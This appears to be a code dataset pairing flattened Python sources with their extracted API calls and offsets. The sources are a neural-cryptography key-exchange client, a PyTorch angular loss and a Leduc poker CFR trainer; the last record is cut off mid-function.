# from socketIO_client import SocketIO, LoggingNamespace import sys import socketio import numpy as np import math from random import randrange sio = socketio.Client() @sio.on('receive_chaos_output2') def on_message(msg): if msg['output'] == tpmclient.tpm.chaosmap(): tpmclient.IsSync = True print('SUCCESS: synched with Bob') sio.disconnect() tpmclient.save_key() # save key to KEYS @sio.on('receive_chaos_output') def on_message(msg): sio.emit('confirm_chaos_output', { 'msg':'sending chaos output', 'output': tpmclient.tpm.chaosmap(), 'sid': tpmclient.partner_sid } ) if msg['output'] == tpmclient.tpm.chaosmap(): tpmclient.IsSync = True print('SUCCESS: synched with Alice') sio.disconnect() tpmclient.save_key() # save key to KEYS @sio.on('output_received') def on_message(msg): if tpmclient.tpm.out == msg['output']: tpmclient.tpm.update_weights(msg['output']) if tpmclient.n >= 200: if tpmclient.n % 10 == 0: tpmclient.send_chaos_output() if not tpmclient.IsSync: tpmclient.send_vector_and_output() # print("output received", + msg['output']) animation.update() @sio.on('get_weights') def on_message(msg): try: vector = msg['vector'] list_vec = [np.array(vector[x:x+16]) for x in range(0, len(vector), 16)] tpmclient.receive_vector(list_vec) tpmclient.send_output() if tpmclient.tpm.out == msg['output']: tpmclient.tpm.update_weights(msg['output']) # print("output received", + msg['output']) animation.update() except socketio.exceptions.BadNamespaceError: pass @sio.on('status') def on_message(msg): if 'assign Alice' in msg: tpmclient.user = msg['assign Alice'] if 'assign Bob' in msg and not tpmclient.user: tpmclient.user = msg['assign Bob'] if 'start' in msg: if tpmclient.user == 'A': tpmclient.partner_sid = msg["BSid"] # print(' B sid is ' + tpmclient.partner_sid) tpmclient.send_vector_and_output() else: tpmclient.partner_sid = msg["ASid"] # print(' A sid is ' + tpmclient.partner_sid) print("Partner's sid is: " + tpmclient.partner_sid) # print('message from server: ' + msg['message']) @sio.event def connect(): sio.emit('my message', " Client connected", namespace='/') sio.emit('join', {'channel': CHANNEL}, namespace='/') print("Connected to server") class TPMClient: def __init__(self): self.user = None self.tpm = TPM(16, 16, 100) self.n = 0 self.IsSync = False def send_vector_and_output(self): vector = self.rand_vec() list_vec = [np.array(vector[x:x+16]) for x in range(0, len(vector), 16)] self.tpm.get_output(list_vec) sio.emit('weights', { 'msg':'sending random vector and output', 'vector': vector, 'output': self.tpm.out, 'sid': tpmclient.partner_sid } ) self.n += 1 def receive_vector(self, vector_): vec = [np.array(x) for x in vector_] self.tpm.get_output(vec) def rand_vec(self): l = [] for i in range(256): l.append(randrange(-100, 100)) return l def send_output(self): sio.emit('send_output', { 'msg':'sending output', 'output': self.tpm.out, 'sid': tpmclient.partner_sid } ) def send_chaos_output(self): sio.emit('send_chaos_output', { 'msg':'sending chaos output', 'output': self.tpm.chaosmap(), 'sid': tpmclient.partner_sid } ) def save_key(self): re = [abs(item+155) for sublist in self.tpm.weights for item in sublist] key = bytes(abs(x) for x in re).decode('cp437') with open("KEYS/{}.txt".format(CHANNEL), "w") as text_file: print(key, file=text_file) class TPM: def __init__(self, k_, n_, l_): self.k = k_ self.n = n_ self.l = l_ self.weights = self.initialize_w() self.inputs = None self.H = np.zeros(self.k) self.out = None self.X = None def get_output(self, input_): self.X = input_ self.out = 1 for i in range(self.k): self.H[i] = self.signum(np.dot(input_[i], self.weights[i])) self.out *= self.signum(np.dot(input_[i], self.weights[i])) def initialize_w(self): p = [] for i in range(self.k): p.append(np.random.randint(-self.l, self.l, size=self.n)) return p def signum(self, x): return math.copysign(1, x) def update_weights(self, outputB): for i in range(self.k): for j in range(self.n): self.weights[i][j] += self.X[i][j] * self.out * self.isequal(self.out, self.H[i]) * self.isequal(self.out, outputB) self.weights[i][j] = self.g(self.weights[i][j]) def isequal(self, A, B): if A==B: return 1.0 else: return 0.0 def g(self, w): if w > self.l: return self.l if w < -self.l: return -self.l else: return w def chaosmap(self): r = sum(list(np.hstack(self.weights))) rr = sum([abs(x) for x in (list(np.hstack(self.weights)))]) t = float(abs(r)) / float(rr) x = t for i in range(rr): x = (3.6 + t/2)* x *(1 - x) return x class Animation: def __init__(self): self.animation = [ "Synchronizing [ ]", "Synchronizing [= ]", "Synchronizing [=== ]", "Synchronizing [==== ]", "Synchronizing. [===== ]", "Synchronizing. [====== ]", "Synchronizing. [======= ]", "Synchronizing. [========]", "Synchronizing.. [ =======]", "Synchronizing.. [ ======]", "Synchronizing.. [ =====]", "Synchronizing.. [ ====]", "Synchronizing...[ ===]", "Synchronizing...[ ==]", "Synchronizing...[ =]", "Synchronizing...[ ]", "Synchronizing [ ]"] self.i = 0 self.timer = None def update(self): print(self.animation[self.i % len(self.animation)], end='\r') self.i += 1 if __name__ == "__main__": CHANNEL = sys.argv[1] tpmclient = TPMClient() animation = Animation() # sio.connect('https://tpmserver.herokuapp.com/') sio.connect('http://localhost:5000')
[ "socketio.Client", "numpy.zeros", "numpy.hstack", "math.copysign", "numpy.random.randint", "numpy.array", "random.randrange", "numpy.dot" ]
[((152, 169), 'socketio.Client', 'socketio.Client', ([], {}), '()\n', (167, 169), False, 'import socketio\n'), ((4404, 4420), 'numpy.zeros', 'np.zeros', (['self.k'], {}), '(self.k)\n', (4412, 4420), True, 'import numpy as np\n'), ((4928, 4947), 'math.copysign', 'math.copysign', (['(1)', 'x'], {}), '(1, x)\n', (4941, 4947), False, 'import math\n'), ((1398, 1424), 'numpy.array', 'np.array', (['vector[x:x + 16]'], {}), '(vector[x:x + 16])\n', (1406, 1424), True, 'import numpy as np\n'), ((2858, 2884), 'numpy.array', 'np.array', (['vector[x:x + 16]'], {}), '(vector[x:x + 16])\n', (2866, 2884), True, 'import numpy as np\n'), ((3276, 3287), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (3284, 3287), True, 'import numpy as np\n'), ((3429, 3449), 'random.randrange', 'randrange', (['(-100)', '(100)'], {}), '(-100, 100)\n', (3438, 3449), False, 'from random import randrange\n'), ((4616, 4650), 'numpy.dot', 'np.dot', (['input_[i]', 'self.weights[i]'], {}), '(input_[i], self.weights[i])\n', (4622, 4650), True, 'import numpy as np\n'), ((4688, 4722), 'numpy.dot', 'np.dot', (['input_[i]', 'self.weights[i]'], {}), '(input_[i], self.weights[i])\n', (4694, 4722), True, 'import numpy as np\n'), ((4821, 4868), 'numpy.random.randint', 'np.random.randint', (['(-self.l)', 'self.l'], {'size': 'self.n'}), '(-self.l, self.l, size=self.n)\n', (4838, 4868), True, 'import numpy as np\n'), ((5561, 5584), 'numpy.hstack', 'np.hstack', (['self.weights'], {}), '(self.weights)\n', (5570, 5584), True, 'import numpy as np\n'), ((5628, 5651), 'numpy.hstack', 'np.hstack', (['self.weights'], {}), '(self.weights)\n', (5637, 5651), True, 'import numpy as np\n')]
import torch import torch.nn as nn import numpy as np def Angular(margin):#angular mc #https://github.com/ronekko/deep_metric_learning/blob/master/lib/functions/angular_loss.py return AngularLoss(margin=margin) class AngularLoss(nn.Module): def __init__(self,margin): super(AngularLoss, self).__init__() self.margin = margin def forward(self, embedding, label): batch_size=embedding.size(0) embed_anchor=embedding[0:batch_size//2,:] embed_pos=embedding[batch_size//2:batch_size,:] alpha = np.deg2rad(self.margin) sq_tan_alpha = torch.tan(torch.from_numpy(alpha.reshape(1,1)).float().cuda()[0][0]) ** 2 n_pairs = embed_anchor.size()[0] # first and second term of f_{a,p,n} term1 = 4 * sq_tan_alpha * (embed_anchor + embed_pos).mm(embed_pos.transpose(0, 1)) term2 = 2 * (1 + sq_tan_alpha) * (embed_pos*embed_anchor).sum(dim=1) f_apn = term1-term2.repeat(n_pairs,1) mask = torch.ones(n_pairs,n_pairs)-torch.eye(n_pairs,n_pairs) f_apn = f_apn*mask.cuda() loss = f_apn.exp().sum(dim=1).log().mean() return loss,0,0
[ "torch.ones", "torch.eye", "numpy.deg2rad" ]
[((557, 580), 'numpy.deg2rad', 'np.deg2rad', (['self.margin'], {}), '(self.margin)\n', (567, 580), True, 'import numpy as np\n'), ((998, 1026), 'torch.ones', 'torch.ones', (['n_pairs', 'n_pairs'], {}), '(n_pairs, n_pairs)\n', (1008, 1026), False, 'import torch\n'), ((1026, 1053), 'torch.eye', 'torch.eye', (['n_pairs', 'n_pairs'], {}), '(n_pairs, n_pairs)\n', (1035, 1053), False, 'import torch\n')]
#Library import numpy as np import pandas as pd import matplotlib.pyplot as plt import random import itertools import doctest import copy import math import wandb from tqdm import tqdm from collections import defaultdict #Node Class #information set node class definition class Node: #1 #Leduc_node_definitions def __init__(self, NUM_ACTIONS, infoSet, num_players=2): self.NUM_ACTIONS = NUM_ACTIONS self.NUM_PLAYERS = num_players self.infoSet = infoSet self.c = 0 self.regretSum = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float) self.strategy = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float) self.strategySum = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float) self.possible_action = self.Get_possible_action_by_information_set() self.Get_strategy_through_regret_matching() def Get_possible_action_by_information_set(self): #{0:"f", 1:"c", 2:"r"} """return int >>> Node(3, "JccKc").Get_possible_action_by_information_set() array([1, 2]) >>> Node(3, "Jr").Get_possible_action_by_information_set() array([0, 1, 2]) >>> Node(3, "JccJc").Get_possible_action_by_information_set() array([1, 2]) >>> Node(3, "J").Get_possible_action_by_information_set() array([1, 2]) """ infoset_without_hand_card = self.infoSet[1:] if LeducTrainer().card_num_check(infoset_without_hand_card) == 1: private_cards, history_before, community_card, history_after = LeducTrainer().Split_history("??" + infoset_without_hand_card) infoset_without_hand_card = history_after if len(infoset_without_hand_card) == 0 or infoset_without_hand_card.count("r") == 0: return np.array([1,2], dtype=int) elif infoset_without_hand_card.count("r") == 1: return np.array([0,1,2], dtype=int) elif infoset_without_hand_card.count("r") == 2: return np.array([0,1], dtype=int) #regret-matching def Get_strategy_through_regret_matching(self): self.normalizingSum = 0 for a in self.possible_action: self.strategy[a] = self.regretSum[a] if self.regretSum[a]>0 else 0 self.normalizingSum += self.strategy[a] for a in self.possible_action: if self.normalizingSum >0 : self.strategy[a] /= self.normalizingSum else: self.strategy[a] = 1/len(self.possible_action) # calculate average-strategy def Get_average_information_set_mixed_strategy(self): self.avgStrategy = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float) self.normalizingSum = 0 for a in self.possible_action: self.normalizingSum += self.strategySum[a] for a in self.possible_action: if self.normalizingSum >0 : self.avgStrategy[a] = self.strategySum[a] / self.normalizingSum else: self.avgStrategy[a] = 1/len(self.possible_action) return self.avgStrategy # Leduc Trainer class LeducTrainer: def __init__(self, train_iterations=10, num_players = 2): #f: FOLD, c: CALL , r:RAISE self.train_iterations = train_iterations self.NUM_PLAYERS = num_players self.ACTION_DICT = {0:"f", 1:"c", 2:"r"} self.NUM_ACTIONS = 3 self.nodeMap = defaultdict(list) self.eval = None self.card_rank = self.make_rank() def make_rank(self): """return dict >>> LeducTrainer(num_players=2).make_rank() == {"KK":6, "QQ":5, "JJ":4, "KQ":3, "QK":3, "KJ":2, "JK":2, "QJ":1, "JQ":1} True """ card_deck = self.card_distribution() card_unique = card_deck[::2] card_rank = {} count = (len(card_unique)-1)*len(card_unique) //2 for i in range(len(card_unique)-1,-1, -1): for j in range(i-1, -1, -1): card_rank[card_unique[i] + card_unique[j]] = count card_rank[card_unique[j] + card_unique[i]] = count count -= 1 count = (len(card_unique)-1)*len(card_unique) //2 +1 for i in range(len(card_unique)): card_rank[card_unique[i] + card_unique[i]] = count count += 1 return card_rank def Rank(self, my_card, com_card): """return int >>> LeducTrainer(num_players=2).Rank("J", "Q") 1 >>> LeducTrainer(num_players=2).Rank("Q", "J") 1 >>> LeducTrainer(num_players=2).Rank("K", "K") 6 """ hand = my_card + com_card return self.card_rank[hand] def card_distribution(self): """return list >>> LeducTrainer(num_players=2).card_distribution() ['J', 'J', 'Q', 'Q', 'K', 'K'] >>> LeducTrainer(num_players=3).card_distribution() ['T', 'T', 'J', 'J', 'Q', 'Q', 'K', 'K'] """ card = ["2", "3", "4", "5", "6", "7", "8", "9", "T", "J", "Q", "K"] card_deck = [] for i in range(self.NUM_PLAYERS+1): card_deck.append(card[11-self.NUM_PLAYERS+i]) card_deck.append(card[11-self.NUM_PLAYERS+i]) return card_deck def Split_history(self, history): """return history_before, history_after >>> LeducTrainer(num_players=3).Split_history("JKQcccKcrcc") ('JKQ', 'ccc', 'K', 'crcc') >>> LeducTrainer(num_players=2).Split_history("KQrrcQrrc") ('KQ', 'rrc', 'Q', 'rrc') >>> LeducTrainer(num_players=2).Split_history("QQcrrcKcc") ('QQ', 'crrc', 'K', 'cc') """ for ai, history_ai in enumerate(history[self.NUM_PLAYERS:]): if history_ai in self.card_distribution(): idx = ai+self.NUM_PLAYERS community_catd = history_ai return history[:self.NUM_PLAYERS], history[self.NUM_PLAYERS:idx], community_catd, history[idx+1:] def action_history_player(self, history): #target_player_iのaction 履歴 player_action_list = [[] for _ in range(self.NUM_PLAYERS)] player_money_list_round1 = [1 for _ in range(self.NUM_PLAYERS)] player_money_list_round2 = [0 for _ in range(self.NUM_PLAYERS)] f_count, a_count, raise_count = 0, 0, 0 card = self.card_distribution() private_cards, history_before, community_card, history_after = self.Split_history(history) for hi in history_before: while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f": f_count += 1 player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi) if hi == "c": player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] = max(player_money_list_round1) elif hi == "r" and raise_count == 0: raise_count += 1 player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] += 2 elif hi == "r" and raise_count == 1: player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] += 4 a_count += 1 f_count, a_count, raise_count = 0, 0, 0 for hi in history_after: if hi not in card: while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f": f_count += 1 player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi) if hi == "c": player_money_list_round2[(a_count + f_count)%self.NUM_PLAYERS] = max(player_money_list_round2) elif hi == "r" and raise_count == 0: raise_count += 1 player_money_list_round2[(a_count + f_count)%self.NUM_PLAYERS] += 4 elif hi == "r" and raise_count == 1: player_money_list_round2[(a_count + f_count)%self.NUM_PLAYERS] += 8 a_count += 1 return player_action_list, player_money_list_round1, player_money_list_round2, community_card def action_player(self, history): """return int >>> LeducTrainer().action_player("JJc") 1 >>> LeducTrainer().action_player("JQcr") 0 >>> LeducTrainer(num_players=3).action_player("JQTrfr") 0 """ player_action_list = [[] for _ in range(self.NUM_PLAYERS)] a_count = 0 f_count = 0 if self.card_num_check(history) == self.NUM_PLAYERS: for hi in history[self.NUM_PLAYERS:]: while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f": f_count += 1 player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi) a_count += 1 elif self.card_num_check(history) == self.NUM_PLAYERS+1: private_cards, history_before, community_card, history_after = self.Split_history(history) for hi in history_after: while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f": f_count += 1 player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi) a_count += 1 return (a_count + f_count)%self.NUM_PLAYERS #6 Return payoff for terminal states #if terminal states return util def Return_payoff_for_terminal_states(self, history, target_player_i): """return int >>> int(LeducTrainer().Return_payoff_for_terminal_states("KQrf", 0)) 1 >>> int(LeducTrainer().Return_payoff_for_terminal_states("QKcrf", 0)) -1 >>> int(LeducTrainer().Return_payoff_for_terminal_states("QKrrf", 0)) -3 >>> int(LeducTrainer().Return_payoff_for_terminal_states("JJccQcc", 0)) 0 >>> int(LeducTrainer().Return_payoff_for_terminal_states("JKccQcc", 1)) 1 >>> int(LeducTrainer().Return_payoff_for_terminal_states("JQcrcKcrc", 0)) -7 >>> int(LeducTrainer().Return_payoff_for_terminal_states("JQcrcKcrc", 1)) 7 >>> int(LeducTrainer().Return_payoff_for_terminal_states("QKrrcQrrf", 0)) -9 >>> int(LeducTrainer().Return_payoff_for_terminal_states("QKrrcQrrc", 0)) 13 >>> int(LeducTrainer().Return_payoff_for_terminal_states("QKrrcQcc", 0)) 5 """ #round1 finish if history.count("f") == self.NUM_PLAYERS -1 and self.card_num_check(history) == self.NUM_PLAYERS: player_action_list = [[] for _ in range(self.NUM_PLAYERS)] player_money_list_round1 = [1 for _ in range(self.NUM_PLAYERS)] player_money_list_round2 = [0 for _ in range(self.NUM_PLAYERS)] f_count, a_count, raise_count = 0, 0, 0 for hi in history[self.NUM_PLAYERS:]: while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f": f_count += 1 player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi) if hi == "c": player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] = max(player_money_list_round1) elif hi == "r" and raise_count == 0: raise_count += 1 player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] += 2 elif hi == "r" and raise_count == 1: player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] += 4 a_count += 1 if len(player_action_list[target_player_i]) >= 1 and player_action_list[target_player_i][-1] == "f": return -player_money_list_round1[target_player_i] else: return sum(player_money_list_round1) -player_money_list_round1[target_player_i] #round2 finish #target_player_i action history player_action_list, player_money_list_round1, player_money_list_round2, community_card = self.action_history_player(history) # target_player_i :fold if player_action_list[target_player_i][-1] == "f": return -player_money_list_round1[target_player_i] - player_money_list_round2[target_player_i] #周りがfold last_play =[hi[-1] for idx, hi in enumerate(player_action_list) if idx != target_player_i] if last_play.count("f") == self.NUM_PLAYERS - 1: return sum(player_money_list_round1) + sum(player_money_list_round2) - player_money_list_round1[target_player_i] - player_money_list_round2[target_player_i] #show down show_down_player =[idx for idx, hi in enumerate(player_action_list) if hi[-1] != "f"] show_down_player_card = {} for idx in show_down_player: show_down_player_card[idx] = self.Rank(history[idx], community_card) max_rank = max(show_down_player_card.values()) if show_down_player_card[target_player_i] != max_rank: return - player_money_list_round1[target_player_i] - player_money_list_round2[target_player_i] else: win_num = len([idx for idx, card_rank in show_down_player_card.items() if card_rank == max_rank]) return float((sum(player_money_list_round1) + sum(player_money_list_round2))/win_num) - player_money_list_round1[target_player_i] - player_money_list_round2[target_player_i] # whetther terminal_states def whether_terminal_states(self, history): """return string >>> LeducTrainer().whether_terminal_states("JKccKr") False >>> LeducTrainer().whether_terminal_states("QJccJcc") True >>> LeducTrainer().whether_terminal_states("QQcr") False >>> LeducTrainer(num_players=3).whether_terminal_states("QKTrff") True >>> LeducTrainer(num_players=3).whether_terminal_states("KKTcccQcrcrcc") True """ if history.count("f") == self.NUM_PLAYERS -1 : return True if self.card_num_check(history) == self.NUM_PLAYERS +1 : private_cards, history_before, community_card, history_after = self.Split_history(history) if history_after.count("r") == 0 and history_after.count("c") == self.NUM_PLAYERS: return True if history.count("r") >=1 : idx = 0 for i,hi in enumerate(history_after): if hi == "r": idx = i if history_after[idx+1:].count("c") == self.NUM_PLAYERS -1 : return True return False def card_num_check(self, history): """return string >>> LeducTrainer(num_players=3).card_num_check("JKTccc") 3 >>> LeducTrainer(num_players=2).card_num_check("KQcr") 2 """ cards = self.card_distribution() count = 0 for hi in history: if hi in cards: count += 1 return count def whether_chance_node(self, history): """return string >>> LeducTrainer().whether_chance_node("JKcc") True >>> LeducTrainer().whether_chance_node("KQcr") False >>> LeducTrainer().whether_chance_node("") True >>> LeducTrainer(num_players=3).whether_chance_node("KQTcc") False """ if history == "": return True if self.card_num_check(history) == self.NUM_PLAYERS : if history.count("r") == 0 and history.count("c") == self.NUM_PLAYERS: return True if history.count("r") >=1 : idx = 0 for i,hi in enumerate(history): if hi == "r": idx = i if history[idx+1:].count("c") == self.NUM_PLAYERS -1 : return True return False #make node or get node def Get_information_set_node_or_create_it_if_nonexistant(self, infoSet): node = self.nodeMap.get(infoSet) if node == None: node = Node(self.NUM_ACTIONS, infoSet, self.NUM_PLAYERS) self.nodeMap[infoSet] = node return node #chance sampling CFR def chance_sampling_CFR(self, history, target_player_i, iteration_t, p_list): if self.card_num_check(history) == self.NUM_PLAYERS + 1: private_cards, history_before, community_card, history_after = self.Split_history(history) player = self.action_player(history) if self.whether_terminal_states(history): return self.Return_payoff_for_terminal_states(history, target_player_i) elif self.whether_chance_node(history): if len(history) == 0: self.cards = self.card_distribution() random.shuffle(self.cards) nextHistory = "".join(self.cards[:self.NUM_PLAYERS]) return self.chance_sampling_CFR(nextHistory, target_player_i, iteration_t, p_list) else: nextHistory = history + self.cards[self.NUM_PLAYERS] return self.chance_sampling_CFR(nextHistory, target_player_i, iteration_t, p_list) infoSet = history[player] + history[self.NUM_PLAYERS:] node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet) util_list = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float) nodeUtil = 0 node.Get_strategy_through_regret_matching() for ai in node.possible_action: nextHistory = history + self.ACTION_DICT[ai] p_change = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float) p_change[player] = node.strategy[ai] util_list[ai] = self.chance_sampling_CFR(nextHistory, target_player_i, iteration_t, p_list * p_change) nodeUtil += node.strategy[ai] * util_list[ai] if player == target_player_i: for ai in node.possible_action: regret = util_list[ai] - nodeUtil p_exclude = 1 for idx in range(self.NUM_PLAYERS): if idx != player: p_exclude *= p_list[idx] node.regretSum[ai] += p_exclude * regret node.strategySum[ai] += node.strategy[ai] * p_list[player] return nodeUtil #chance sampling CFR def vanilla_CFR(self, history, target_player_i, iteration_t, p_list): if self.card_num_check(history) == self.NUM_PLAYERS + 1: private_cards, history_before, community_card, history_after = self.Split_history(history) player = self.action_player(history) if self.whether_terminal_states(history): return self.Return_payoff_for_terminal_states(history, target_player_i) elif self.whether_chance_node(history): if len(history) == 0: cards = self.card_distribution() cards_candicates = [cards_candicate for cards_candicate in itertools.permutations(cards, self.NUM_PLAYERS+1)] utility_sum = 0 for cards_i in cards_candicates: self.cards_i = cards_i nextHistory = "".join(cards_i[:self.NUM_PLAYERS]) utility_sum += (1/len(cards_candicates))* self.vanilla_CFR(nextHistory, target_player_i, iteration_t, p_list) return utility_sum else: nextHistory = history + self.cards_i[self.NUM_PLAYERS] return self.vanilla_CFR(nextHistory, target_player_i, iteration_t, p_list) infoSet = history[player] + history[self.NUM_PLAYERS:] node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet) node.Get_strategy_through_regret_matching() util_list = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float) nodeUtil = 0 if not self.eval: strategy = node.strategy else: strategy = node.Get_average_information_set_mixed_strategy() for ai in node.possible_action: nextHistory = history + self.ACTION_DICT[ai] p_change = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float) p_change[player] = strategy[ai] util_list[ai] = self.vanilla_CFR(nextHistory, target_player_i, iteration_t, p_list * p_change) nodeUtil += strategy[ai] * util_list[ai] if (not self.eval) and player == target_player_i: for ai in node.possible_action: regret = util_list[ai] - nodeUtil p_exclude = 1 for idx in range(self.NUM_PLAYERS): if idx != player: p_exclude *= p_list[idx] node.regretSum[ai] += p_exclude * regret node.strategySum[ai] += strategy[ai] * p_list[player] return nodeUtil #external sampling MCCFR def external_sampling_MCCFR(self, history, target_player_i): if self.card_num_check(history) == self.NUM_PLAYERS + 1: private_cards, history_before, community_card, history_after = self.Split_history(history) player = self.action_player(history) if self.whether_terminal_states(history): return self.Return_payoff_for_terminal_states(history, target_player_i) elif self.whether_chance_node(history): if len(history) == 0: self.cards = self.card_distribution() random.shuffle(self.cards) nextHistory = "".join(self.cards[:self.NUM_PLAYERS]) return self.external_sampling_MCCFR(nextHistory, target_player_i) else: nextHistory = history + self.cards[self.NUM_PLAYERS] return self.external_sampling_MCCFR(nextHistory, target_player_i) infoSet = history[player] + history[self.NUM_PLAYERS:] node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet) node.Get_strategy_through_regret_matching() if player == target_player_i: util_list = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float) nodeUtil = 0 for ai in node.possible_action: nextHistory = history + self.ACTION_DICT[ai] util_list[ai] = self.external_sampling_MCCFR(nextHistory, target_player_i) nodeUtil += node.strategy[ai] * util_list[ai] for ai in node.possible_action: regret = util_list[ai] - nodeUtil node.regretSum[ai] += regret else: sampling_action = np.random.choice(list(range(self.NUM_ACTIONS)), p= node.strategy) nextHistory = history + self.ACTION_DICT[sampling_action] nodeUtil= self.external_sampling_MCCFR(nextHistory, target_player_i) for ai in node.possible_action: node.strategySum[ai] += node.strategy[ai] return nodeUtil #outcome sampling MCCFR def outcome_sampling_MCCFR(self, history, target_player_i, iteration_t, p_list,s): if self.card_num_check(history) == self.NUM_PLAYERS + 1: private_cards, history_before, community_card, history_after = self.Split_history(history) player = self.action_player(history) if self.whether_terminal_states(history): return self.Return_payoff_for_terminal_states(history, target_player_i) / s, 1 elif self.whether_chance_node(history): if len(history) == 0: self.cards = self.card_distribution() random.shuffle(self.cards) nextHistory = "".join(self.cards[:self.NUM_PLAYERS]) return self.outcome_sampling_MCCFR(nextHistory, target_player_i, iteration_t, p_list, s) else: nextHistory = history + self.cards[self.NUM_PLAYERS] return self.outcome_sampling_MCCFR(nextHistory, target_player_i, iteration_t, p_list, s) infoSet = history[player] + history[self.NUM_PLAYERS:] node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet) node.Get_strategy_through_regret_matching() probability = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float) if player == target_player_i: for ai in node.possible_action: probability[ai] = self.epsilon/len(node.possible_action)+ (1-self.epsilon)* node.strategy[ai] else: for ai in node.possible_action: probability[ai] = node.strategy[ai] sampling_action = np.random.choice(list(range(self.NUM_ACTIONS)), p=probability) nextHistory = history + self.ACTION_DICT[sampling_action] if player == target_player_i: p_change = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float) p_change[player] = node.strategy[sampling_action] util, p_tail = self.outcome_sampling_MCCFR(nextHistory, target_player_i, iteration_t, p_list*p_change, s*probability[sampling_action]) p_exclude = 1 for idx in range(self.NUM_PLAYERS): if idx != player: p_exclude *= p_list[idx] w = util * p_exclude for ai in node.possible_action: if sampling_action == ai: regret = w*(1- node.strategy[sampling_action])*p_tail else: regret = -w*p_tail * node.strategy[sampling_action] node.regretSum[ai] += regret else: p_change = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float) for idx in range(self.NUM_PLAYERS): if idx!= player: p_change[idx] = node.strategy[sampling_action] util, p_tail = self.outcome_sampling_MCCFR(nextHistory, target_player_i, iteration_t, p_list*p_change, s*probability[sampling_action]) p_exclude = 1 for idx in range(self.NUM_PLAYERS): if idx != player: p_exclude *= p_list[idx] for ai in node.possible_action: node.strategySum[ai] += (iteration_t - node.c)*p_exclude*node.strategy[ai] node.c = iteration_t #node.strategySum[ai] += (p1/s)*node.strategy[ai] return util, p_tail*node.strategy[sampling_action] #KuhnTrainer main method def train(self, method): self.exploitability_list = {} for iteration_t in tqdm(range(int(self.train_iterations))): for target_player_i in range(self.NUM_PLAYERS): p_list = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float) if method == "vanilla_CFR": self.vanilla_CFR("", target_player_i, iteration_t, p_list) elif method == "chance_sampling_CFR": self.chance_sampling_CFR("", target_player_i, iteration_t, p_list) elif method == "external_sampling_MCCFR": self.external_sampling_MCCFR("", target_player_i) elif method == "outcome_sampling_MCCFR": self.epsilon = 0.6 self.outcome_sampling_MCCFR("", target_player_i, iteration_t, p_list, 1) #calculate expolitability if iteration_t in [int(j)-1 for j in np.logspace(1, len(str(self.train_iterations))-1, (len(str(self.train_iterations))-1)*3)] : self.exploitability_list[iteration_t] = self.get_exploitability_dfs() if wandb_save: wandb.log({'iteration': iteration_t, 'exploitability': self.exploitability_list[iteration_t]}) self.show_plot(method) def show_plot(self, method): plt.scatter(list(self.exploitability_list.keys()), list(self.exploitability_list.values()), label=method) plt.plot(list(self.exploitability_list.keys()), list(self.exploitability_list.values())) plt.xscale('log') plt.yscale('log') plt.xlabel("iterations") plt.ylabel("exploitability") plt.legend(loc = "lower left") if wandb_save: wandb.save() # evaluate average strategy def eval_strategy(self, target_player_i): self.eval = True p_list = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float) average_utility = self.vanilla_CFR("", target_player_i, 0, p_list) self.eval = False return average_utility def calc_best_response_value(self, best_response_strategy, best_response_player, history, prob): if self.card_num_check(history) == self.NUM_PLAYERS + 1: private_cards, history_before, community_card, history_after = self.Split_history(history) player = self.action_player(history) if self.whether_terminal_states(history): return self.Return_payoff_for_terminal_states(history, best_response_player) elif self.whether_chance_node(history): if len(history) == 0: cards = self.card_distribution() cards_candicates = [cards_candicate for cards_candicate in itertools.permutations(cards, self.NUM_PLAYERS)] utility_sum = 0 for cards_i in cards_candicates: nextHistory = "".join(cards_i[:self.NUM_PLAYERS]) utility = (1/len(cards_candicates))* self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, prob) utility_sum += utility return utility_sum else: com_cards = self.card_distribution() com_cards.remove(history[0]) com_cards.remove(history[1]) utility_sum_round2 = 0 for com_cards_i in com_cards: nextHistory = history + com_cards_i utility_sum_round2 += (1/len(com_cards))*self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, prob) return utility_sum_round2 infoSet = history[player] + history[self.NUM_PLAYERS:] node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet) if player == best_response_player: if infoSet not in best_response_strategy: action_value = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float) br_value = np.array([0 for _ in 